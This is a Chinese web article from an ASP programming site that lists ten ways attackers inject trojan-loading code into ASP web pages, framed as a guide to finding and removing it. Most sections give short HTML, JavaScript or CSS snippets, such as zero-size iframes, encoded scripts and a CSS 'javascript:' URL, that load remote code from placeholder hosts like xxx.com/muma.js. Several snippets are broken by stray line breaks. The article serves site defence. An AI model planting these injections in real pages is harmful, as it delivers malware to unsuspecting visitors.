当前位置:K88软件开发文章中心编程语言AspAsp01 → 文章内容

Asp页面上十大挂马方式总结与解决方法

减小字体 增大字体 作者:佚名     来源:asp编程网  发布时间:2018-12-30 8:33:57

这篇文章指在告诉大家黑客经常在网页挂马方式,从而可以对自己的asp网页进行防范,只要检测这些经常被用于挂马的地方,很容易找到木马的所在。

一:框架挂马

<
iframe src=地址 width=0 height=0>
<
/iframe>

其中“地址”处可以输入恶意网站链接等

二:js文件挂马

只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS代码页面有没有被故意拉长等。

三:js变形加密

<
SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt>
<
/script>

muma.txt可改成任意后缀


四:body挂马

<
body >
<
/body>

五:隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<
iframe src="http://www.xxx.com/muma.htm/">
<
/iframe>
'

六:css中挂马

body
{
background-image: url('javascript:document.write("<
script src=http://www.XXX.net/muma.js>
<
/script>
")')}

这种方式比较狠,也比较难发现。

七:JAJA挂马

<
SCRIPT language=javascript>

window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1")

<
/script>

八:图片伪装

<
html>

<
iframe src="网马地址" height=0 width=0>
<
/iframe>

<
img src="图片地址">
<
/center>

<
/html>

九:伪装调用

<
frameset rows="444,0" cols="*">

<
frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">

<
frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">

<
/frameset>

十:高级欺骗

<
a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" >
页面要显示的内容 <
/a>

<
SCRIPT Language="JavaScript">

function www_163_com ()

{
var url="网马地址"

open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10")

}
<
/SCRIPT>

如何发现多个页面上都有上面的代码出现在页面上,那么就需要批量替换工具,将这些代码替换掉,这不是根本的解决方法。根本的解决方法是:找出网站的漏洞,把堵起来,下次就不会出现自己asp页面被别人加上这些代码了。



Asp页面上十大挂马方式总结与解决方法